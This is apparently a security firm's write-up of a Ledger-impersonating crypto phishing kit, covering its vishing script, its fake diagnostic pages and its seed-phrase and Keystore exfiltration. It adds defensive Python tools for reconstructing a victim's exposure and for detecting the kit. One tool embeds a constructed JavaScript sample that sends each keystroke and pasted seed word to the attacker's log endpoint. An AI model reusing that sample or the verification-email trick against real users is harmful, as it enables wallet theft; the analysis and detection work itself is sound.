It started with bacon and eggs.
Michael Roberts, one of Rexxfield’s former founders, was having his usual morning coffee when a phishing email landed in his inbox. It was impersonating ANZ Bank — claiming suspicious activity from an IP address in Frankfurt, Germany. The sender address? . Not even close to ANZ.

Most people would delete it and move on. Michael called the scammers instead.
Over the next two hours, Michael social-engineered the threat actors into revealing their entire operation. By pretending to be an unsophisticated crypto holder with multiple Bitcoin in a wallet he couldn’t figure out how to withdraw from, he extracted information the scammers would never have given up voluntarily: money mule bank accounts, crypto wallet addresses, their IP address, voice recordings of the call, and, critically, the secret method they used to convince victims they were real Ledger Support.
That secret method is what makes this operation different from most phishing campaigns we investigate.
The Scammers Sent Real Verification Emails from Ledger’s Own Servers
Here’s what the threat actors revealed during the call with Michael: they used actual Ledger hardware and a legitimate Ledger Recover subscription to trigger real verification emails — sent from , directly to their victims.
Think about that for a moment. The victim receives an email that passes every authenticity check, because it really was sent by Ledger’s mail infrastructure: the sender domain is correct, SPF and DKIM pass, the branding is correct, and the verification code is real. And the scammer, posing as “Ledger Support” on a voice call, simply asks the victim to read back the code so they can “verify your identity.”
The victim hands over the verification code. The scammer uses it to access the victim’s account through Ledger Recover.
This isn’t a cloned email template. This is Ledger’s actual infrastructure being weaponized as a trust-building tool inside a social engineering chain. The attackers understood that a real email from was worth more than any spoofed message they could craft themselves.
A Fake Ledger Live Site That Was Nearly Indistinguishable from the Real Thing
While Michael kept the scammers busy on the phone, Rexxfield’s threat hunting team went to work mapping their infrastructure. The primary phishing domain — ledger.com.lc — hosted a full clone of Ledger’s production interface built with a level of detail that went beyond typical phishing kits.
The kit ripped assets directly from Ledger’s production CDN. Ledger’s proprietary HMAlphaMono font — including the content-hashed filename from Ledger’s Vite build — was embedded in the kit’s source code. Product images for all six Ledger hardware devices (Stax, Flex, Nano Gen5, Nano S, Nano S Plus, and Nano X) were sourced directly from Ledger’s build with their original filenames intact. This wasn’t someone rebuilding Ledger’s UI from screenshots. This was a direct mirror of production assets.
Seven Pages, One Goal: Your Seed Phrase
The phishing kit funneled victims through a carefully staged seven-page sequence, each designed to build trust, manufacture urgency, and ultimately harvest the one thing that controls a crypto wallet: the recovery seed phrase.
Stage 1 — Fake device selection. The victim chooses their Ledger device from a grid of six products with authentic imagery. Every button leads to the same place. The selection is meaningless — it exists to make the site feel real at first contact.

Stage 2 — Options menu with live surveillance. The victim sees five wallet management options: diagnostic check, wallet restore, new wallet setup, Keystore import, and one more. Every click fires a JSON POST to log.php before navigation, recording the selected option and an ISO 8601 timestamp. The operator knows what the victim is thinking before they reach the next page. This page also embeds a live chat widget.
Stage 3 — Fake diagnostic with scripted suspense. A 26-second countdown cycles through five status messages — “Finding devices,” “Device located,” “Verifying firmware integrity,” “Analyzing security protocols,” and “Finalizing diagnostic report.” No actual device communication occurs. The countdown exists solely to build procedural credibility before delivering the manufactured crisis.
Stage 4 — The fabricated emergency. A red-styled error page displays “CRITICAL ISSUE DETECTED” alongside a fictional error code (LD3-XI3-0x4A7F) in monospace. The warning copy claims hardware integrity has been compromised. The call-to-action reads “Repair and Recover Your Device” — which links directly to the seed phrase harvesting page.

Stage 5 — Seed phrase capture. This is the core of the operation. The victim enters their 12-, 18-, or 24-word BIP39 recovery phrase, plus an optional passphrase. And here’s where the kit gets aggressive: it doesn’t wait for the victim to hit submit.
Three Exfiltration Mechanisms Running Simultaneously
The seed phrase harvesting page runs three independent data capture systems at once — a level of redundancy that tells you how valuable each seed phrase is to these operators.
Real-time keystroke logging. Every word input field has an event listener that fires a POST request on every single keystroke. The attacker receives the seed phrase word by word, in real time, before the victim ever clicks a button.


Clipboard paste interception. If the victim pastes their seed phrase, the handler suppresses the default browser behavior, splits the clipboard text on whitespace, fills each field sequentially, and fires a separate POST for every individual word. Pasting a 24-word phrase therefore triggers 24 logging requests in a single burst: a fully indexed seed capture in under a second.
Form submission failsafe. When the victim clicks submit, the complete word list and passphrase are bundled and POSTed to a separate endpoint (send.php). This is redundant by design: even if individual keystroke requests fail, the final submission captures everything.
The passphrase field gets the same treatment — its toggle state and every keystroke are logged independently.
And if any word the victim enters doesn’t match the official BIP39 English wordlist? The kit rejects it after an 11-second delay and forces re-entry. This isn’t a bug — it’s a quality filter. The operators only want valid, usable seed phrases reaching their backend.
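The practical question for anyone responding to a victim of this kit is whether the seed was already exfiltrated before the victim backed out. The script below is an added example (not Rexxfield’s code and not the kit’s) that reconstructs what the operator received from a victim’s captured browser traffic, channel by channel: it replays the per-keystroke log.php stream to the last value seen per field, detects the paste burst (many distinct word fields posted within one second), and checks for the send.php bundle. The request body schema ({"field": "word7", "value": ...} and {"words": [...], "passphrase": ...}) is an assumption, since the article names the endpoints but does not print the kit’s payload format; the capture and timestamps are constructed.

```python
"""Reconstruct what a seed-harvesting kit received from one victim's browser session.

Added example, not Rexxfield's code and not the kit's. Input is a flattened list of
the browser's outbound requests, as a HAR export or proxy log gives once bodies are
JSON-decoded. The body field names are an ASSUMPTION: the article names log.php and
send.php but does not show the kit's payload schema.
"""
import json
from datetime import datetime, timedelta, timezone

LOG_ENDPOINT = "log.php"    # per-keystroke and per-pasted-word channel
SEND_ENDPOINT = "send.php"  # bundle posted on form submission
KIT_ORIGIN = "https://ledger.com.lc/"

# Constructed sample phrase: the first 24 words of the BIP39 English list, not a real wallet.
SAMPLE_WORDS = ("abandon ability able about above absent absorb abstract absurd abuse access "
                "accident account accuse achieve acid acoustic acquire across act action actor "
                "actress actual").split()


def _iso(t):
    return t.strftime("%Y-%m-%dT%H:%M:%S.") + f"{t.microsecond // 1000:03d}Z"


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def _endpoint(url):
    return url.split("?")[0].rsplit("/", 1)[-1]


def build_sample_capture():
    """Constructed session: victim types word 1 (7 keystrokes), pastes all 24 words
    ten seconds later, then clicks submit ten seconds after that. Timestamps are invented."""
    t0 = datetime(2025, 1, 10, 8, 1, 0, tzinfo=timezone.utc)
    reqs = []
    for i in range(1, len(SAMPLE_WORDS[0]) + 1):  # one POST per keystroke
        reqs.append({"url": KIT_ORIGIN + LOG_ENDPOINT, "ts": _iso(t0 + timedelta(milliseconds=300 * i)),
                     "body": {"field": "word1", "value": SAMPLE_WORDS[0][:i]}})
    paste_at = t0 + timedelta(seconds=10)
    for n, w in enumerate(SAMPLE_WORDS, start=1):  # one POST per pasted word, 2 ms apart
        reqs.append({"url": KIT_ORIGIN + LOG_ENDPOINT, "ts": _iso(paste_at + timedelta(milliseconds=2 * n)),
                     "body": {"field": f"word{n}", "value": w}})
    reqs.append({"url": KIT_ORIGIN + SEND_ENDPOINT, "ts": _iso(t0 + timedelta(seconds=20)),
                 "body": {"words": list(SAMPLE_WORDS), "passphrase": ""}})
    return reqs


def reconstruct_from_log(requests):
    """Final value per word field on the log.php channel: the last value the kit saw for
    each input is what the operator holds, whether it arrived typed or pasted."""
    fields = {}
    for r in sorted(requests, key=lambda r: _parse(r["ts"])):
        if _endpoint(r["url"]) == LOG_ENDPOINT and str(r["body"].get("field", "")).startswith("word"):
            fields[r["body"]["field"]] = r["body"]["value"]
    return fields


def find_paste_bursts(requests, window_ms=1000, min_fields=12):
    """Sliding window over log.php posts. >= min_fields distinct word fields inside
    window_ms is the paste handler's signature (one POST per word); a human typing
    touches one field at a time."""
    logs = sorted((r for r in requests if _endpoint(r["url"]) == LOG_ENDPOINT), key=lambda r: _parse(r["ts"]))
    bursts, i = [], 0
    while i < len(logs):
        start, j, fields = _parse(logs[i]["ts"]), i, set()
        while j < len(logs) and _parse(logs[j]["ts"]) - start <= timedelta(milliseconds=window_ms):
            fields.add(logs[j]["body"]["field"])
            j += 1
        if len(fields) >= min_fields:
            bursts.append({"start": logs[i]["ts"], "end": logs[j - 1]["ts"], "fields": len(fields)})
            i = j
        else:
            i += 1
    return bursts


def submitted_bundle(requests):
    return next((r["body"] for r in requests if _endpoint(r["url"]) == SEND_ENDPOINT), None)


def assess_exposure(requests, expected_len=None):
    """What the operator holds and via which channel. Pass expected_len (the victim's
    phrase length) when known: without it and without a send.php bundle, a partial
    field set cannot be told apart from a complete shorter phrase."""
    fields = reconstruct_from_log(requests)
    words = [fields[k] for k in sorted(fields, key=lambda k: int(k[4:]))]
    bundle = submitted_bundle(requests)
    n = expected_len or (len(bundle["words"]) if bundle else len(words))
    log_complete = len(words) >= n and n in (12, 18, 24) and all(words[:n])
    return {
        "words_via_log": words,
        "log_channel_complete": log_complete,
        "paste_bursts": find_paste_bursts(requests),
        "submitted": bundle is not None,
        "passphrase": bundle.get("passphrase") if bundle else None,
        "exposed": log_complete or bundle is not None,
    }


if __name__ == "__main__":
    print(json.dumps(assess_exposure(build_sample_capture()), indent=2))
```

On the constructed capture, truncating the request list before the paste burst reports nothing usable exposed, while truncating it before send.php still reports the full phrase exposed through the log.php channel alone, which is the point the kit’s design makes: the submit button is irrelevant to whether the seed leaked.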
A Second Attack Path for Software Wallet Users
The kit maintained a parallel track for victims using software wallets with Keystore files. When a victim selected or dropped a file into the upload area, that file was immediately exfiltrated via a background fetch request — before the victim clicked any “Import” button and before entering a password. Even if the victim abandoned the form or closed the tab, the attackers already had the encrypted file.
A keystroke logger on the password field captured the decryption key separately. Two independent data streams, one encrypted wallet.
The Operators Were Watching in Real Time
Both the options menu and the seed phrase page embedded a fully functional live chat widget. This wasn’t decorative. The system collected victim names and email addresses at session start, generated a unique 32-character hex session ID per victim, and polled the backend every two seconds for incoming operator messages.

A comment in the session ID generation code explicitly referenced compatibility with an “admin panel” — confirming a separate operator-facing dashboard for managing multiple concurrent victim sessions. This is an operator-in-the-loop architecture. A human attacker could interact with hesitant victims in real time, address their concerns, and talk them through entering their seed phrase.
What Happened When the Scammers Realized Someone Was Hunting Them
After hours of sustained social engineering and infrastructure mapping by the Rexxfield team, the threat actors finally realized they were being pursued. They shut down their website. They checked their banking accounts.
But it was already too late. The phishing infrastructure had been archived and analyzed. Banking accounts tied to the operation were frozen. Money tracing was underway. New investigative leads had been identified and documented. Takedown requests had been submitted for the scammer domains.
All of that before Michael finished his morning routine.
What This Means for Crypto Holders
This operation illustrates a shift in how phishing campaigns target cryptocurrency users. The attackers didn’t just clone a website — they integrated Ledger’s own verification infrastructure into their social engineering chain, giving victims a genuine trust signal at the exact moment they needed to lower their guard.
If you hold crypto on a hardware wallet, keep these realities in mind:
Ledger will never call you. No legitimate hardware wallet company will cold-call or cold-email you asking to “verify” anything. If someone contacts you claiming to be Ledger Support, it’s a scam — even if the verification email they trigger is real.
A real email doesn’t mean a real support interaction. Attackers can use legitimate services to generate authentic-looking communications. The email being real doesn’t make the person who told you to expect it real.
Your seed phrase is the master key. There is no diagnostic, no firmware update, no “wallet insurance activation” that requires you to type your recovery phrase into a website. Ever. Full stop.
Urgency is the weapon. Every stage of this kit was designed to manufacture a crisis and compress the victim’s decision-making window. Real security issues don’t require you to act in the next 30 seconds.
Indicators of Compromise
Primary phishing domain: ledger.com.lc
Phishing email sender (ANZ impersonation):
Server-side endpoints observed in kit source:
- log.php — centralized keystroke, paste, and event logging
- send.php — redundant seed phrase capture on form submission
- upload_early.php — silent pre-submission Keystore file exfiltration
- backend/save_user_message.php — live chat message persistence
- backend/get_messages.php — operator message delivery (polled every 2 seconds)
- load_seed2.php — post-harvest decoy seed phrase generator
Ripped Ledger asset confirming CDN mirroring: HMAlphaMono-Medium-O3SXNZYE.woff2 (content-hash filename from Ledger’s production Vite build)
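The asset mirroring, the three exfiltration handlers, the two-second chat polling and the endpoint names above together make a usable static fingerprint for this kit family. The script below is an added example (not Rexxfield’s tooling and not the kit’s source) that triages a downloaded kit’s files against those traits. The endpoint names and the HMAlphaMono filename come from the IoC list; the regexes for keystroke exfiltration, paste interception and polling are my own heuristics and will need tuning on real samples, and the SAMPLE_KIT_JS and BENIGN_JS inputs are constructed to exercise them.

```python
"""Static triage of a downloaded phishing kit for the traits described in this article.

Added example, not Rexxfield's tooling and not the kit's source. Endpoint names and
the HMAlphaMono filename are from the article's IoC list; the regexes are heuristics
of my own (ASSUMPTIONS about how such handlers are written), and the two sample
inputs below are constructed, not recovered from the kit.
"""
import re
from pathlib import Path

KNOWN_ENDPOINTS = [
    "log.php", "send.php", "upload_early.php",
    "backend/save_user_message.php", "backend/get_messages.php", "load_seed2.php",
]

CHECKS = {
    # Vite names emitted assets <name>-<8-char hash>.<ext>; carrying
    # HMAlphaMono-Medium-O3SXNZYE.woff2 means the file was copied out of Ledger's build.
    "mirrored_ledger_font": re.compile(r"HMAlphaMono[\w-]*?-[A-Za-z0-9_-]{8}\.woff2"),
    # Keystroke listener that issues a request within a few hundred characters.
    "keystroke_exfil": re.compile(
        r"addEventListener\(\s*['\"](?:input|keyup|keydown)['\"][\s\S]{0,300}?"
        r"(?:fetch\(|XMLHttpRequest|navigator\.sendBeacon)"),
    # Paste handler that cancels the browser paste and splits the clipboard on whitespace.
    "paste_split": re.compile(
        r"['\"]paste['\"][\s\S]{0,400}?preventDefault\(\)[\s\S]{0,400}?split\(\s*/\\s\+/"),
    # Two-second polling loop, the interval the article reports for the chat widget.
    "poll_2s": re.compile(r"setInterval\([\s\S]{0,200}?,\s*2000\s*\)"),
    "admin_panel_comment": re.compile(r"admin\s*panel", re.I),
    # The BIP39 English list opens abandon, ability, able; an embedded copy is how a
    # kit can reject words that are not on the list.
    "bip39_wordlist": re.compile(r"['\"]abandon['\"]\s*,\s*['\"]ability['\"]\s*,\s*['\"]able['\"]"),
}
WEIGHTS = {"known_endpoints": 3, "mirrored_ledger_font": 2, "keystroke_exfil": 3,
           "paste_split": 3, "poll_2s": 1, "admin_panel_comment": 1, "bip39_wordlist": 2}
VERDICT_THRESHOLD = 5


def triage(source: str) -> dict:
    """Score one file's text; returns matched traits (with a short snippet each), a score
    and a verdict. Any single heuristic can fire on benign code; the score is what matters."""
    findings = {}
    endpoints = [e for e in KNOWN_ENDPOINTS if e in source]
    if endpoints:
        findings["known_endpoints"] = endpoints
    for name, rx in CHECKS.items():
        snippets = [m.group(0)[:60] for m in rx.finditer(source)]
        if snippets:
            findings[name] = snippets
    score = sum(WEIGHTS[k] for k in findings)
    return {"findings": findings, "score": score,
            "verdict": "seed-harvesting kit" if score >= VERDICT_THRESHOLD else "no strong indicators"}


def triage_dir(root) -> dict:
    """Run triage over every .html/.js/.php/.css file under root (real-kit usage)."""
    return {str(p): triage(p.read_text(errors="replace"))
            for p in Path(root).rglob("*") if p.suffix in (".html", ".js", ".php", ".css")}


# Constructed input written to exercise the checks; NOT the kit's source.
SAMPLE_KIT_JS = r"""
const wordlist = ["abandon", "ability", "able", "about"]; // a real kit would embed all 2048
const font = "/assets/HMAlphaMono-Medium-O3SXNZYE.woff2";
document.querySelectorAll("input.word").forEach((el, i) => {
  el.addEventListener("input", () => {
    fetch("log.php", { method: "POST", body: JSON.stringify({ field: "word" + (i + 1), value: el.value }) });
  });
});
document.addEventListener("paste", (e) => {
  e.preventDefault();
  e.clipboardData.getData("text").trim().split(/\s+/).forEach((w, i) =>
    fetch("log.php", { method: "POST", body: JSON.stringify({ field: "word" + (i + 1), value: w }) }));
});
// session id format kept compatible with the admin panel
setInterval(() => fetch("backend/get_messages.php?sid=" + sid), 2000);
"""

# Constructed benign page: an input listener and a timer, but no request on keystroke.
BENIGN_JS = r"""
const box = document.getElementById("search");
box.addEventListener("input", () => render(filter(items, box.value)));
setInterval(tick, 1000);
"""

if __name__ == "__main__":
    print(triage(SAMPLE_KIT_JS))
    print(triage(BENIGN_JS))
```

The endpoint check is a plain substring match and the weights are arbitrary starting points; on a real sample, run triage_dir over the unpacked kit and read the snippets rather than trusting the verdict alone.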
Rexxfield has been a first responder in cybercrime investigations since 2008. We support law enforcement, legal teams, and victims globally. If you’ve encountered this phishing kit or a similar crypto scam, contact our investigators.
